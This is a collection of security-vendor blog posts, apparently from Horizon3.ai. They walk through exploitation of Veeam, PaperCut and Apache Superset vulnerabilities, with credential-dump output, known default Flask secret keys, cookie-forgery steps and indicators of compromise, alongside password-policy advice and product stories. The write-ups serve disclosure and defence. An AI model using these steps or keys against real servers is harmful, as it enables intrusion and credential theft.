In this case, NodeZero found that this privileged user had the same credentials for local admin and domain user on the company’s Azure account, and from the domain user account was able to pivot laterally for further access. MFA was not enabled, so NodeZero proceeded to gain access into their Azure cloud environment and then get into Outlook. With this valid domain account, NodeZero accessed 25 business e-mails, and as proof, NodeZero showed the customer the subject lines of the e-mails it was able to access.

From here, an attacker could log in legitimately as a company employee, craft an e-mail, and send it to the customer base; in the case of a banking collapse or accounting change, the attacker could direct customers to change their invoicing and remit payments for vendor services to the attacker’s personal account. Both the company and the customer lose money and trust.

What can we do about it? We recommend:

  • Require the use of multifactor authentication for logging into external environments and segmented networks when possible.
    • If you’re using Azure AD, you can enable Azure AD Password Protection to automatically ban well-known bad passwords.
  • Assess and analyze your employees’ passwords to ensure they meet your minimum requirements.
    • Institute password policies that include sophistication and length requirements as described in the latest recommendations from NIST Special Publication 800-63B. NOTE: Horizon3 recommends a 12-character minimum for users and more for privileged users, as several other companies do.
    • When creating a temporary password for a new user or a user that requires an account unlock, require the password to be used within a specific timeframe before the account becomes disabled.
    • Do NOT allow passwords that have appeared in previous breaches or are contextually based on the company name, the user’s personal name or login, or their role.
    • Implement a configuration management process that requires default credentials (including and especially empty, null, or “guest” defaults) to be changed before systems are deployed in a production environment.
  • Implement good access controls to include the principle of “least privilege.”
  • Disable the accounts of current or former employees who no longer require access.
  • Always verify that each of the above guidelines is implemented, enforced, and effective by attacking your teams, tools, and rules using NodeZero.
  • And lastly, increase employee training on basic cybersecurity, including the dangers of credential reuse and weak or easily guessed passwords, and the social engineering TTPs to watch out for and avoid.
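
The password guidance above can be sketched as a simple screening function. The breach list, contextual terms, and helper name here are illustrative placeholders; a real deployment would check against a full breach corpus:

```python
# Illustrative NIST SP 800-63B-style password screen.
# BREACHED and CONTEXT_TERMS are placeholder sets, not real data.
BREACHED = {"password123!", "welcome123456", "letmein12345"}
CONTEXT_TERMS = {"acme", "admin", "finance"}  # company name, role, etc.

def password_ok(password: str, username: str, min_len: int = 12) -> bool:
    p = password.lower()
    if len(password) < min_len:
        return False                      # fails length requirement
    if p in BREACHED:
        return False                      # seen in a previous breach
    if username.lower() in p:
        return False                      # contains the user's login
    if any(term in p for term in CONTEXT_TERMS):
        return False                      # contextually guessable
    return True
```

The point is that length alone is not the bar; a long password that embeds the company name or the user’s login should still be rejected.
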
The post Silicon Valley Bank (SVB) Failure Could Signal a Rise in Business E-mail Compromise (BEC) appeared first on

NodeZero™ Analytics Unleashes and Extends the Power of NodeZero’s Advanced Pentesting and Analysis

14 March 2023 at 19:09

Businesswire 03/14/2023

, a leading cybersecurity firm specializing in autonomous penetration testing, today launched a major product refresh, doubling down on its commitment to help organizations continuously verify their security posture.

Read the entire article here

The post’s NodeZero™ Analytics Unleashes and Extends the Power of NodeZero’s Advanced Pentesting and Analysis appeared first on

Veeam Backup and Replication CVE-2023-27532 Deep Dive

23 March 2023 at 12:15


Veeam has recently released an advisory for CVE-2023-27532 in Veeam Backup and Replication, which allows an unauthenticated user with access to the Veeam backup service (TCP 9401 by default) to request cleartext credentials. Others, including Huntress, Y4er, and CODE WHITE, have provided insight into this vulnerability. In this post, we hope to offer additional insights and release our POC (found here), which is built on .NET Core and capable of running on Linux.

Examining the Vulnerable Port

We first determine what application is using vulnerable port 9401.

Find application using port 9401
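
As a quick sanity check before reversing, we can confirm the service port is reachable. A minimal stdlib sketch (9401 is the default port; the host value is whatever you are testing against):

```python
import socket

def port_open(host: str, port: int = 9401, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```
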

Now we can begin to reverse engineer the Veeam Backup Service. By default, the service binary and its associated assemblies are in C:\Program Files\Veeam\Backup and Replication\Backup, and the log file for the backup service is located at C:\ProgramData\Veeam\Backup\Svc_VeeamBackup.log. Searching for the port in question in the log file gives a string that we can search for in the binary.

Find port in log file



Next we dig into the call to CreateService and eventually find ourselves at a private constructor for CRemoteInvokeServiceHolder:



The use of ServiceHost, NetTcpBinding, and AddServiceEndpoint gives us enough context to know that this app is hosting a Windows Communication Foundation (WCF) service. The service exposes the IRemoteInvokeService interface to the client, and the interface is implemented by CVbRestoreServiceStub on the server side.

The use of NetTcpBinding tells us that this service uses a binary protocol built on TCP intended for WCF-to-WCF communication. This restricts our client implementation to a .NET language, as it would be rather difficult to write a custom WCF binary parser. We do not want our POC to be restricted to running on Windows, so we will use .NET Core.

Constructing a WCF Client

Before we can create a client, we need the service interface definition. Based on previous research, we know that we need a few credential-based methods from the DatabaseManager scope. We end up with the following definition:

Now we can try to connect to the service:

Our first attempt is met with the following error:

/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://
Unhandled exception. System.ServiceModel.ProtocolException: The requested upgrade is not supported by 'net.tcp://'. This could be due to mismatched bindings (for example security enabled on the client and not on the server).

If we look back at CRemoteInvokeServiceHolder, we see that the NetTcpBinding was created with parameter "invokeServiceBinding". We can find the configuration parameters for this binding in Veeam.Backup.Service.exe.config:



With this information, we can update our POC. After disabling certificate validation and setting the correct DNSIdentity, we have the following:

Running the POC we get:

/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://
Unhandled exception. System.ServiceModel.FaultException: Data at the root level is invalid. Line 1, position 1.

This indicates that we were able to successfully invoke the service. The error is a result of us passing invalid XML. Now we can begin to figure out how to extract credentials from this API.

Extracting Credentials

Based on previous research, we know that we can invoke CredentialsDbScopeGetAllCreds to get a binary blob containing credential information. If we look at the implementation of ExecuteCredentialsDbScopeGetAllCreds we see that this blob is a serialized C# object created by Veeam’s custom CProxyBinaryFormatter.



If we dump this data to a file, we can see that there is username and password information, but it is not immediately obvious how to parse it out of the binary blob. We don’t want to reimplement Veeam’s custom serialization class, and we also don’t want to have to reference their assemblies. So what can we do? It looks like there are some easily parseable GUIDs prefixed by $.

CredentialsDbScopeGetAllCreds output
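
Rather than reimplementing the serializer, those $-prefixed GUID strings can be carved straight out of the blob. The actual POC is C# on .NET Core; this Python sketch only illustrates the carving idea, with the $ prefix as observed in the dump above:

```python
import re
import uuid

# GUIDs appear in the blob as ASCII text prefixed by '$'.
GUID_RE = re.compile(
    rb"\$([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}"
    rb"-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"
)

def extract_guids(blob: bytes) -> list[str]:
    """Carve '$'-prefixed GUID strings out of a serialized credential blob."""
    return [str(uuid.UUID(m.decode())) for m in GUID_RE.findall(blob)]
```
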

We see that these GUIDs match the ids used for Credentials in the Veeam database:

Credentials in Veeam database

We can now use the CredentialsDbScopeFindCredentials endpoint to get one credential at a time. Our code to extract the GUIDs looks like:

The output from CredentialsDbScopeFindCredentials is still a binary blob, but at least we can now work with one credential at a time instead of a list. We still have the problem of parsing out the usernames and passwords. Luckily, we found a Stack Overflow post detailing how to use a custom serializer to get object properties as key-value pairs. We can now extract the usernames and passwords with ease.

Running our POC we get the following output:

/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://
UserName = dev Password = Super Secret Password 
UserName = root Password = 
UserName = root Password = 
UserName = root Password = 
UserName = root Password =


In conclusion, CVE-2023-27532 allows an unauthenticated user with access to the Veeam backup service to request cleartext credentials. We have examined the vulnerable port, reverse engineered the Veeam Backup Service, and constructed a WCF client using .NET Core. We have also shown how to extract credentials from the Veeam database by invoking the CredentialsDbScopeGetAllCreds and CredentialsDbScopeFindCredentials endpoints. Finally, we have released our POC on GitHub; it is built on .NET Core and capable of running on Linux, making it accessible to a wider audience. This vulnerability should be taken seriously, and patches should be applied as soon as possible to ensure the security of your organization.

The post Veeam Backup and Replication CVE-2023-27532 Deep Dive appeared first on

Public University Uses NodeZero to Close Gaps, Prove Value of Cybersecurity

11 April 2023 at 15:54

One of our customers, a public university in Victoria, British Columbia, is constantly looking for ways to improve their overall cybersecurity posture – and has started using NodeZero’s autonomous pentesting capabilities to keep their students, faculty, and data safe.

Speaking with us was the University’s Senior IT Security and Risk Specialist, a role that didn’t exist until 2017. Like many organizations, the university needed an in-house champion to bring cybersecurity top of mind.

“Before that, there wasn’t someone dedicated to security, and virtually no policies for cybersecurity at all,” he mentioned. “My role as the sole security person here touches all areas from proposing and drafting policies, to firing up the Zeek server to look at the logs, look for strange traffic, and everything in between.”

Since joining, he has been working on aligning the university’s cybersecurity policies with industry best practices in a number of areas, and instituted a handful of programs to address vulnerability management and user management.

A while back, the organization ran into a situation where there were an abundance of minor account compromises that cumulatively turned into a hassle for everyone involved. Taking the lead, the risk specialist started building out awareness training, advocating basic policies and building an expectation of some basic cyber hygiene.

“We started to reduce the number of those kinds of incidents, which also worked out well as that was right around the time we had a few minor ransomware incidents,” he said.

“But because I’d done that work with the business units (developing better awareness and preparedness), we were able to resolve those incidents quickly.” This also led to the university realizing it needed someone in that security role full time.

NodeZero as a Difference Maker

The university wanted to do some penetration testing to get confirmation that the changes they’d been implementing were working and to identify any security gaps that might remain.

“I took advantage of some pre-negotiated contracts in place by our being a public body, and asked vendors for some quotes. After my heart restarted after seeing the quotes, I just happened to get an email from the Horizon3.ai sales team and said, ‘ok let’s take a look at it’,” said the risk specialist. “I saw the ability of NodeZero to do what I needed to do at a similar cost, but also with the ability to repeat that find, fix, verify process and customize the testing the way I wanted it done.”

That flexibility and the find, fix, verify loop really drew him in during the initial test.

“That’s really what we wanted to do,” he said. “The way it’s set up allows for that. It shows where problems are and provides guidance on what we need to do to fix it. It has the right philosophy, as opposed to just asking: what can we break into? I can get a kid from high school to hack away at our network, but the question is, how do we fix it?” He also found that the ability to do multiple pentests is a huge benefit.

“It was a breath of fresh air. I can repeat this!” he said. “When one network segment showed some interesting vulnerabilities, I was able to fix them and repeat the test to verify that things were much better.”

This was the difference from traditional pentesting options, where it would cost thousands of dollars and take weeks, if not months, to bring a team in to test and assess every time.

Improving Credentials Hygiene and Beyond

NodeZero was particularly helpful in addressing the common struggles associated with credentials hygiene and patching.

“We have people who felt that having a nice, long password meant nobody would ever guess it. We’re now able to show that’s not true,” said the risk specialist. Character count matters, but a long password is ineffective when it has been exposed in a previous breach or is a simple string.

NodeZero provides password analytics from the NTDS database in their domain, pinpointing exactly where their credential policy is effective. NodeZero was also able to help with vulnerabilities that were consistently getting flagged as weaknesses in scans.

“Those vulnerabilities became a pivot point – we now have proof that there’s a vulnerability, here’s what happens when it exists, now let’s fix it,” he said.

This helped minimize pushback and enabled him to offer proof to higher-ups. By reporting on vulnerabilities and other cybersecurity issues so that everyone in a leadership role sees them at the same time, everyone knows what needs to be fixed – which fosters the cooperation needed to move those improvements forward quickly and easily.

Deciding on NodeZero

The University did look at other, traditional pentesting options as well as NodeZero before signing on.

“Typically, they were security companies that had a standing contract with our provincial government,” said the specialist. “I didn’t look at anyone doing it autonomously the way NodeZero does it. I saw the chance to spend the same money but gain more capabilities.”

Coincidentally, the opportunity for a trial run came up at the end of the fiscal year, and there was some budget left, which enabled him to show leadership the value of NodeZero.

“The reports enabled my CIO to show the executive team that we’re being proactive and taking the steps our board wants us to take, and we can demonstrate we’re taking positive action to secure our environment,” he said.

The IT and Risk Specialist has been very impressed not just with NodeZero as a tool, but also by the team behind it. “I’ll tell you, the support is phenomenal,” he told us. “I can’t tell you how many times I’ve been in the middle of an op and the chat bubble pops up because someone is there and concerned that I’m having an issue. It takes customer service to the next level.”

The team’s proactive approach has made a big difference.

“I’ve come in to work in the morning and found an email from someone at letting me know they’d reviewed our ops, found a vulnerability, and let me know how to fix it,” he said.

And then there’s the overall ease of use NodeZero offers.

“Setting up an op is simple. It’s so easy an old guy like me can do it, and it not only tells me what’s broken but how to fix it,” he remarked. “It shows the attack chain, how it got in, how to fix it, and then I can use that to demonstrate to others what needs to happen. We get the attack chain, proof, and how to fix it, all in one package.”

Download PDF

The post Public University Uses NodeZero to Close Gaps, Prove Value of Cybersecurity appeared first on

Blackhat 2023 USA

By: Cassie
17 March 2023 at 20:52

Date: August 5-10, 2023
Location: Mandalay Bay, Las Vegas

Description: Now in its 26th year, Black Hat USA returns to the Mandalay Bay Convention Center in Las Vegas with a 6-day program. The two-day main conference (August 9-10) will feature more than 100 selected Briefings, dozens of open-source tool demos in Arsenal, a robust Business Hall, networking and social events, and much more.

Visit us at booth #3144

The post Blackhat 2023 USA appeared first on

PaperCut CVE-2023-27350 Deep Dive and Indicators of Compromise

24 April 2023 at 11:15


On 8 March 2023, PaperCut released new versions of their enterprise print management software, which included patches for two vulnerabilities: CVE-2023-27350 and CVE-2023-27351. The PaperCut security advisory describes CVE-2023-27350 as a vulnerability that may allow an attacker to achieve remote code execution and compromise the PaperCut application server. PaperCut also notes in the advisory that they became aware of the issue through the Zero Day Initiative (ZDI). The ZDI case, ZDI-CAN-18987, describes the vulnerability as an authentication bypass that leads to code execution.

On 19 April 2023, PaperCut became aware of in-the-wild exploitation of the product and published additional details including several indicators of compromise such as log file entries, known malicious domains, and YARA rules to detect observed malicious activity.

Subsequent research by Huntress detailing this vulnerability was released on 21 April 2023, including exploitation details and additional indicators of compromise.

In this post we’ll walk through the methodology of discovering the vulnerability given the security advisory, look at the root cause, analyze the patch, and develop an exploit proof-of-concept.

Locating the Vulnerability

Inspecting the ZDI case reveals valuable information within the Vulnerability Details:

The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM.

We find that the JAR that contains this SetupCompleted class is within C:\Program Files\PaperCut NG\server\lib\pcng-server-web-19.2.7.jar.

Decompiling a JAR can be done several ways, in this case we use CFR. CFR is a useful utility that can decompile Java via the command line to human-readable code that can be used as input for diff’ing tools.

java -jar cfr-0.152.jar v19.2.7/web-jar/pcng-server-web-19.2.7.jar --outputdir v19.2.7/web-jar/decompiled/

Looking at the decompiled class ./biz/papercut/pcng/web/setup/, we see that upon submitting the form it calls performLogin() for the Admin user on line 48.

The performLogin() function can be found at ./biz/papercut/pcng/web/pages/

This function is normally called throughout the software only after a user has had their password validated through a login flow. However, here in the SetupCompleted flow, the logic accidentally validates the session of the anonymous user. This type of web application vulnerability is called Session Puzzling.

Comparing the vulnerable SetupCompleted class from v19.2.7 to the patched version in v21.2.11 with Meld, we see that if setup has already been completed, visiting this page will now redirect to the “Home” page – eliminating the session puzzling logic flaw.

Confirming the authentication bypass in the GUI, we browse to the page at and click “Login”.

Developing the Exploit

Huntress’s blog details a method to obtain remote code execution by abusing the built-in “Scripting” functionality for printers. Inspecting the Device Scripting page, we see that it enables the administrator to develop hooks that customize printing across the enterprise.

The scripts are written in JavaScript and execute in the context of the PaperCut service, which runs as NT AUTHORITY\SYSTEM on Windows deployments.

Developing a script to interact with the site would normally be pretty straightforward, but the PaperCut web application uses dynamic form fields based on the last request, which makes it slightly less so.

To develop the exploit proof-of-concept, you’ll have to use sessions and individually request each page as you would through the user interface to ensure the form fields are populated properly.

Our full proof-of-concept exploit can be found on our GitHub.

Indicators of Compromise

PaperCut has been compiling indicators observed from in-the-wild exploitation in their advisory, which will be the best source of indicators to be on the lookout for. This section lists indicators observed when exploiting this vulnerability using our proof-of-concept.

Navigating to the native application logs in the Logs -> Application Log tab, several indicators can be observed. While most of these entries can appear in normal use, special attention should be given to unfamiliar source IP addresses, unusual times, and all of these events happening in quick succession.

Authentication Bypass Indicator:

User "admin" logged into the administration interface.

Settings Change Indicator (Precursor to RCE):

User "admin" updated the config key "<A>" to "<B>".

Specifically print.script.sandboxed and print-and-device.script.enabled.

Remote Code Execution Indicator:

Admin user "admin" modified the print script on printer "<printer>".
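
These entries are easy to scan for programmatically. A minimal sketch in Python, with the indicator patterns taken from the log examples above (real log lines include additional fields, so we match on substrings):

```python
import re

# Patterns drawn from the application-log indicators above.
INDICATORS = {
    "auth_bypass": re.compile(
        r'User "admin" logged into the administration interface'),
    "settings_change": re.compile(
        r'updated the config key "(?:print\.script\.sandboxed'
        r'|print-and-device\.script\.enabled)"'),
    "print_script_rce": re.compile(
        r'modified the print script on printer'),
}

def scan_log(lines):
    """Return (line_number, indicator_name) pairs for matching log lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((n, name))
    return hits
```

As noted above, any single hit may be benign; all three in quick succession from an unfamiliar source IP is the signal worth investigating.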

Internet Exposure

Querying Shodan for http.html:"papercut" http.html:"print" shows approximately 1,700 internet-exposed PaperCut servers.

The PaperCut application is popular with State, Local, and Education (SLED) organizations; education alone makes up 450 of those results.

The post PaperCut CVE-2023-27350 Deep Dive and Indicators of Compromise appeared first on

CVE-2023-27524: Insecure Default Configuration in Apache Superset Leads to Remote Code Execution

25 April 2023 at 11:40

Apache Superset is an open source data visualization and exploration tool. It has over 50K stars on GitHub, and there are more than 3000 instances of it exposed to the Internet. In our research, we found that a substantial portion of these servers – at least 2000 (two-thirds of all servers) – are running with a dangerous default configuration. As a result, many of these servers are effectively open to the public. Any attacker can “log in” to these servers with administrative privileges, access and modify data connected to these servers, harvest credentials, and execute remote code. In this post, we’ll dive deep into the misconfiguration, tracked as CVE-2023-27524, and provide advice for remediation as well as indicators of compromise to look for if you’re a user of Superset.

A Default Flask Secret Key

Superset is written in Python and based on the Flask web framework. A common practice for Flask-based applications is to use cryptographically signed session cookies for user state management. When a user logs in, the web application sends a session cookie that includes a user identifier back to the end user’s browser. The web application signs the cookie with a SECRET_KEY, a value that is supposed to be randomly generated and typically stored in a local configuration file. With every web request, the browser sends the signed session cookie back to the application. The application then validates the signature on the cookie to re-authenticate the user prior to processing the request.

The security of the web application depends critically on ensuring the SECRET_KEY is actually secret. If the SECRET_KEY is exposed, an attacker with no prior privileges could generate and sign their own cookies and access the application, masquerading as a legitimate user. The off-the-shelf flask-unsign tool automates this work: “cracking” a session cookie to discover if it was signed by a weak SECRET_KEY, and then forging a fake but valid session cookie using a known SECRET_KEY.
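
Flask delegates this signing to the itsdangerous library; the core scheme can be sketched with the standard library alone (this is not Flask’s exact cookie format, just the sign-then-verify idea it relies on):

```python
import base64
import hashlib
import hmac
import json

SECRET_KEY = b"change-me"  # placeholder; Flask reads this from app config

def sign_session(data: dict, key: bytes = SECRET_KEY) -> str:
    """Serialize and HMAC-sign a session payload."""
    payload = base64.urlsafe_b64encode(json.dumps(data).encode()).decode()
    sig = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{sig}"

def verify_session(cookie: str, key: bytes = SECRET_KEY) -> dict:
    """Re-authenticate the user by validating the cookie signature."""
    payload, sig = cookie.rsplit(".", 1)
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("invalid session signature")
    return json.loads(base64.urlsafe_b64decode(payload))
```

With the key known, anyone can call sign_session({"user_id": 1}) themselves and present a “valid” cookie, which is exactly the forgery that flask-unsign automates against real Flask applications.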

Back in October 2021, when we first started researching Superset, we noticed that the SECRET_KEY defaults to the value \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h at install time. It’s the end user’s responsibility to modify the application configuration and set the SECRET_KEY to a cryptographically secure random string; this is documented in the Superset configuration guide. But we were curious what percentage of users actually read the documentation. So, using Shodan, we did a basic search for Superset servers on the Internet. Simply requesting the Superset login page (without attempting to log in) returns a session cookie, which we then passed through flask-unsign to determine whether it was signed with the default SECRET_KEY. To our surprise, we found that 918/1288 (> 70%) of all servers were using the default SECRET_KEY!


So what can an attacker do knowing the SECRET_KEY for a Superset application? Assuming the Superset server is not behind single sign-on (SSO), an attacker can log in as an administrator by forging a session cookie with a user_id or _user_id value set to 1, using the off-the-shelf flask-unsign toolkit. “1” corresponds to the first Superset user, who is almost always an administrator. Setting the forged session cookie in the browser’s local storage and refreshing the page allows an attacker to access the application as an administrator. For Superset servers behind SSO, more work may be required to discover a valid user_id value – we have not tested this attack path.

Superset is designed to enable integrations with a variety of databases for exploring data and creating visualizations. Admin access gives attackers a lot of control over these databases and the ability to add and remove database connections. By default, database connections are set up with read-only permissions, but an attacker with admin access can enable writes and DML (data manipulation language) statements. The powerful SQL Lab interface allows attackers to run arbitrary SQL statements against connected databases. Depending on database user privileges, attackers can query, modify, and delete any data in the database as well as execute remote code on the database server.

Remote Code Execution and Credential Harvesting

Administrative interfaces to web applications are often feature-rich and result in remote code execution on the application server. We found reliable paths to remote code execution across different Superset versions in a variety of configurations. Remote code execution is possible both on databases connected to Superset and the Superset server itself. We also found a host of methods for harvesting credentials. These credentials include Superset user password hashes and database credentials, both in plaintext and in a reversible format. We are not disclosing any exploit methods at this time, though we think it’ll be straightforward for interested attackers to figure it out.

More Default Flask Secret Keys

After our initial report to the Superset team back in Oct. 2021, we decided to re-check the state of Superset in Feb. 2023 to see if the situation with the default Flask key had improved.

We discovered that in January 2022 the SECRET_KEY value was rotated to a new default CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET, and a warning was added to the logs with this Git commit.


We were curious if this change translated to a change in user behavior. We repeated the Shodan experiment from October 2021, using both the original default SECRET_KEY and the new one. We also included two other SECRET_KEYs we found, one in a deployment template, thisISaSECRET_1234, and another in the documentation YOUR_OWN_RANDOM_GENERATED_SECRET_KEY.

A basic search for Superset instances produced 3390 results, of which 3176 appeared to genuinely be Superset instances. Of these 3176 instances, we found that 2124 (~67%) were using one of the four default keys.

Usage of Superset has increased over the last year, but use of a default SECRET_KEY hasn’t dropped much, and a large number of installs are running with the new default SECRET_KEY. To be more precise, we did a sweep of Superset instances to grab their version information, which is often visible on the landing page. From this we got a breakdown of default keys in use by version. The rotation of the SECRET_KEY and the addition of the log warning happened with version 1.4.1, yet from 1.4.1 onwards a significant proportion of instances are still running with a default key: 71% of Superset 2.0.0 instances, 55% of 2.0.1 instances, and 87% of the latest Docker version 0.0.0-dev instances.

Alarmed by the numbers, we re-confirmed the attack paths described above and raised the issue again to the Apache security team.


The Superset team made an update with the 2.1 release to not allow the server to start up if it’s configured with a default SECRET_KEY. With this update, many new users of Superset will no longer unintentionally shoot themselves in the foot.

This fix is not foolproof, though, as it’s still possible to run Superset with a default SECRET_KEY if it’s installed through a docker-compose file or a Helm template. The docker-compose file contains a new default SECRET_KEY of TEST_NON_DEV_SECRET that we suspect some users will unwittingly run Superset with. Some configurations also set admin/admin as the default credentials for the admin user.


Among the 2000+ affected users, we found a broad mix of large corporations, small companies, government agencies, and universities. We sent out good-faith notifications to a number of organizations, some of whom remediated shortly after.

If you’re a user of Superset, you can check if your server is vulnerable with this script on Github. The script uses the flask-unsign toolkit to check if the Superset session cookie is signed with one of the known default SECRET_KEYs.

If the script shows your Superset instance is vulnerable and the instance is running on the Internet, we recommend that you fix it immediately or remove it from the Internet.

Fixing the issue requires generating a SECRET_KEY securely and configuring it, following the instructions here. In addition, since sensitive information such as database passwords is also encrypted with the SECRET_KEY, that information will need to be re-encrypted with the new SECRET_KEY. The superset CLI tool automates the process of rotating secrets – see here.

We have not validated exploitation against Superset installs with single sign-on (SSO) configured. SSO may make it hard to forge session cookies if the user_ids are unpredictable GUIDs rather than auto-incrementing identifiers. At the same time, it’s possible there are other attack paths that leak user ids, or the user ids map to easily discoverable identifiers such as email addresses. We recommend remediating even if your Superset install is behind SSO.


Telling if you’ve already been compromised is not easy, because exploiting this misconfiguration allows anyone to masquerade as a legitimate user. Superset provides a detailed action log in the interface that can be used to inspect user activity. We recommend looking for unusual admin-level actions such as viewing or modifying database configuration, adding a new database, exporting data, or unusual queries in the SQL Lab query history. We also recommend checking the application access log for unusual API calls, such as calls to the /api/v1/database endpoint. Of course, an attacker can easily cover their tracks once they fully compromise the server.
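As a starting point for such an access-log review, a simple filter can surface requests to sensitive endpoints. The common-log-style format and the endpoint list below are illustrative assumptions, not Superset specifics:

```python
import re

# Endpoints worth flagging; an assumption for illustration, not an
# exhaustive list of sensitive Superset routes.
SENSITIVE_PATHS = ("/api/v1/database",)

def flag_lines(log_lines):
    hits = []
    for line in log_lines:
        # Pull the request path out of a common-log-style entry
        m = re.search(r'"(?:GET|POST|PUT|DELETE)\s+(\S+)', line)
        if m and any(p in m.group(1) for p in SENSITIVE_PATHS):
            hits.append(line)
    return hits

sample = [
    '10.0.0.5 - - [25/Apr/2023] "GET /superset/welcome/ HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Apr/2023] "POST /api/v1/database/ HTTP/1.1" 201 88',
]
flagged = flag_lines(sample)
```

A one-off filter like this will not catch a careful attacker, but it makes a quick first pass over large logs practical.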

Lessons Learned

The issue of hardcoded Flask secret keys is not new. Apache Airflow, a sister project to Superset, was affected by a similar issue, filed as CVE-2020-17526 and discovered by Junghan Lee of Deliveryhero. Security researcher @iangcarroll automated discovery of vulnerable Airflow instances for bug bounty and wrote a blog post describing the process here. The authentication bypass method he describes is exactly the same as the one described above, as both Airflow and Superset are built on the same framework, Flask AppBuilder.

Later on @iangcarroll found a similar vulnerability in Redash, another open source data visualization tool based on Flask. This was filed as CVE-2021-41192. The approach the Superset team took to addressing this vulnerability – refusing to start the server if it’s running with a default SECRET_KEY – is the same approach the Redash team took.

It’s not often that data is available at scale to understand how security design choices impact user behavior. Checking for vulnerabilities and misconfigurations typically requires crossing ethical boundaries. In this case, we got lucky. Telling if a Superset server is misconfigured simply requires browsing to the login page and cracking the returned session cookie.

It’s commonly accepted that users don’t read documentation and applications should be designed to force users along a path where they have no choice but to be secure by default. The data we’ve gathered backs up this common wisdom. We all know that default credentials and default keys are bad, but how bad are they really? In the case of Superset, the impact of the insecure default Flask key extends to roughly 2/3 of all users. Again, users don’t read documentation. And users don’t read logs. The best approach is to take the choice away from users and require them to take deliberate actions to be purposefully insecure.


  • Oct. 11, 2021: Initial communication to Apache Security team
  • Oct. 12, 2021: Superset team says they will look into issue
  • Jan. 11, 2022: Superset team changes default SECRET_KEY and adds warning to logs with this Git commit
  • Feb. 9, 2023: Email to Apache Security team about new data related to insecure default configuration. Started notifying certain organizations.
  • Feb. 24, 2023: Superset team confirms code change will be made to address default SECRET_KEY
  • Mar. 1, 2023: Pull request merged with code change to address default SECRET_KEY
  • Apr. 5, 2023: Superset 2.1 release
  • Apr. 24, 2023: CVE disclosed
  • Apr. 25, 2023: This post


The post CVE-2023-27524: Insecure Default Configuration in Apache Superset Leads to Remote Code Execution appeared first on

SecureWorld Atlanta

1 May 2023 at 15:55

Date: May 24, 2023
Location: Cobb Galleria Centre, Atlanta, GA

Description: For more than 21 years, SecureWorld has been tackling global cybersecurity issues and sharing critical knowledge and tools needed to protect against ever-evolving threats. Through our network of industry experts, thought leaders, practitioners, and solution providers, we collaborate to produce leading-edge, relevant content.

Visit us at booth #530


Financial sector should perform penetration tests on its own according to EU regulation DORA

4 May 2023 at 15:35

PressePortal 05/04/2023

In 2022, the weekly number of cyberattacks in the financial industry averaged 1,131 attacks – a 52 percent increase in one year, according to Check Point Research figures. More than two-thirds of large institutions were affected by at least one cyberattack, not including successfully prevented attacks and unreported cases…

Read the entire article here


CISA’s Ransomware Vulnerability Awareness Pilot: But Is It Enough?

31 May 2023 at 17:28

In early 2023, CISA launched their Ransomware Vulnerability Awareness Pilot (RVWP). It’s designed to warn critical infrastructure (CI) entities that their systems have exposed vulnerabilities that may be exploited by ransomware threat actors. The plan is to identify affected systems that may be prevalent in CI networks, then notify operators about potential risk of exploitation. The idea behind this is to enable timely mitigation measures before the damage is done in the context of ransomware attacks.

According to the RVWP website, “Once CISA identifies these affected systems, our regional cybersecurity personnel notify system owners of their security vulnerabilities, thus enabling timely mitigation before damaging intrusions occur.” However, almost any exploitable system could allow attackers to gain a foothold, and from there, ransomware is often the next likely outcome, especially if attackers are interested in nothing more than money.

Although CISA’s efforts are a step in the right direction, the real challenge comes from identifying what systems are truly vulnerable to exploitation, then evaluating the likelihood of these systems becoming targets of attackers. Just because a system may have a possible ransom-related vulnerability does not mean it’s exploitable for a host of different reasons, for example, being completely unreachable by attackers. As a result, CI entities will likely be chasing down low-level targets while high-level risks may not get adequately addressed.

Why is ransomware so prevalent?

Most successful ransomware attacks are primarily due to hidden vulnerabilities that have lain dormant within the inner bowels of a network for some time. This endemic problem plaguing American cities (and organizations all over the world) won’t be resolved anytime soon unless organizations accept the fact that yes, they are likely vulnerable to ransomware attacks.

For example, on May 4th news outlets broke the story about the city of Dallas being under ransomware attack. On May 9th, local news stations were still reporting:

  • Computer dispatch was still down in the Dallas 911 call center.
  • Police and firefighters were sent to calls by radio using paper and pencil for addresses.
  • Code enforcement and other non-emergency responses to 311 calls were delayed.
  • City water bill payments were impacted. Disconnections were canceled.

And as of May 17th, local news stations were still reporting that the City of Dallas Ransomware Attack Stretches into Day 15. Although technical details of how the attack progressed are not publicly available, most security-savvy people suspect it was due to a vulnerable system lying in wait.

The real problem concerning ransomware is that too many people don’t really understand what causes a successful ransomware campaign. Most believe it’s some sort of extra-skilled attacker, but that is not always the case. At the very root of the problem are completely exploitable systems (hardware and software) going unchecked. But why is that the case?

Because they often don’t know where they’re vulnerable

Both public and commercial organizations often have no idea where those unchecked vulnerabilities lie. That’s why it’s imperative to get ahead of the game and find the vulnerabilities yourself by attacking your infrastructures the same way an attacker will. This is not a one-and-done proposition, or some periodic list of boxes that you check. You’ll never be able to manage your risk daily if you don’t know where you’re vulnerable. As a result, tools like NodeZero are readily available to perform this continuous function for you today.

The real key to shoring up security of not only CI entities, but also cities, education systems, banks, hospitals, and anything else deemed critical is to determine what is actually exploitable by scanning, testing, and simulating what threat actors would do if they obtained, then maintained a foothold in any network. Ransomware normally begins with a foothold!

